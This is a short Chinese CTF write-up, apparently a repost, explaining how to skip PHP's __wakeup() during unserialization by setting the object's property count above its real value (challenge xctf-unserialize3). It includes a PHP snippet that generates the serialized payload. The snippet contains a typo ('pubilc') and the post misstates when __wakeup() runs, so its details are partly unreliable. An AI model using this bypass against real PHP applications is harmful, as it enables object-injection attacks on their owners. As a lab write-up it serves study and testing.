首页 > 其他 > 详细

跳过__wakeup()魔法函数

时间:2019-11-26 21:16:02      阅读:193      评论:0      收藏:0      [点我收藏+]
__wakeup():将在序列化之后立即被调用。
漏洞原理:当反序列化字符串中,表示属性个数的值大于其真实值,则跳过__wakeup()执行。
 

 
参考题目:xctf-unserialize3
技术分享图片
 
对于该题,先可以看到类xctf中有flag变量,并调用了__wakeup(),则考虑实例化xctf类并将其变量序列化。并猜测意图为将序列化结果输入在?code=后进行POST请求。
 
<?php
class xctf{
public $flag = ‘111‘;
pubilc function __wakeup(){
exit(‘bad requests‘);
}
}
 
$a = new xctf();
echo(serialize($a));
?>
 
// 序列化输出结果为:
// O:4:"xctf":1:{s:4:"flag";s:3:"111";}
 
正常结果输入时,会执行__wakeup(),从而输出‘bad requests‘,并退出脚本,因此利用漏洞绕过__wakeup()。
 
将序列化字符串中代表变量个数的数字改为大于其真实值的数字,并进行POST请求,得到结果。
技术分享图片
得到结果。

跳过__wakeup()魔法函数

原文:https://www.cnblogs.com/CubicZ/p/11938419.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!